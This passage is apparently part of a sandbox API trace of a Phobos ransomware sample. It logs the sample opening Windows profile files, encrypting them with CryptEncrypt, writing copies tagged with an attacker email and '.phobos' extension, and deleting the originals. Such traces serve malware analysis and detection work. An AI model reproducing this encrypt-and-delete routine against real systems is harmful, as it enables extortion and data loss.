hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.076] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.077] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.077] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.077] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18, lpOverlapped=0x0) returned 1 [0211.078] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20, dwBufLen=0x20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20) returned 1 [0211.078] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20, lpOverlapped=0x0) returned 1 [0211.078] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.078] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.079] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0211.079] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.079] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0211.079] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.079] CloseHandle (hObject=0x10c) returned 1 [0211.079] CloseHandle (hObject=0x178) returned 1 [0211.079] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms")) returned 1 [0211.080] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.080] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=15378) returned 1 [0211.080] CloseHandle (hObject=0x178) returned 1 [0211.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms")) returned 0x20 [0211.081] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.081] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.081] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.081] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.081] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.081] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3c12, lpOverlapped=0x0) returned 1 [0211.094] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3c20, dwBufLen=0x3c20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3c20) returned 1 [0211.094] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3c20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3c20, lpOverlapped=0x0) returned 1 [0211.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.095] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.095] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0211.095] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.095] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0211.095] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.095] CloseHandle (hObject=0x178) returned 1 [0211.095] CloseHandle (hObject=0x10c) returned 1 [0211.096] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms")) returned 1 [0211.096] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.097] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=24) returned 1 [0211.097] CloseHandle (hObject=0x10c) returned 1 [0211.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms")) returned 0x20 [0211.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.097] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.097] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.098] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.098] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18, lpOverlapped=0x0) returned 1 [0211.099] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20, dwBufLen=0x20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20) returned 1 [0211.099] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20, lpOverlapped=0x0) returned 1 [0211.100] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.100] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.100] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0211.100] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.100] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0211.100] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.100] CloseHandle (hObject=0x10c) returned 1 [0211.100] CloseHandle (hObject=0x178) returned 1 [0211.100] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms")) returned 1 [0211.101] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.101] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3) returned 1 [0211.101] CloseHandle (hObject=0x178) returned 1 [0211.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget")) returned 0x2020 [0211.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.101] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.102] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.103] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.103] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.103] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3, lpOverlapped=0x0) returned 1 [0211.104] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10, dwBufLen=0x10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10) returned 1 [0211.104] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10, lpOverlapped=0x0) returned 1 [0211.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.104] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.104] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0211.104] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.104] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0211.105] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.105] CloseHandle (hObject=0x178) returned 1 [0211.105] CloseHandle (hObject=0x10c) returned 1 [0211.105] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget")) returned 1 [0211.108] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.109] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=7) returned 1 [0211.109] CloseHandle (hObject=0x10c) returned 1 [0211.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink")) returned 0x2020 [0211.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.109] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.109] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.110] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.110] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.110] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7, lpOverlapped=0x0) returned 1 [0211.110] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10, dwBufLen=0x10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10) returned 1 [0211.110] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10, lpOverlapped=0x0) returned 1 [0211.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.111] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.111] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0211.111] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.111] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0211.112] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.112] CloseHandle (hObject=0x10c) returned 1 [0211.112] CloseHandle (hObject=0x178) returned 1 [0211.112] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink")) returned 1 [0211.113] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.113] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0211.113] CloseHandle (hObject=0x178) returned 1 [0211.113] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.134] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1238) returned 1 [0211.134] CloseHandle (hObject=0x178) returned 1 [0211.134] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk")) returned 0x2020 [0211.134] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.135] SetFilePointerEx (in: 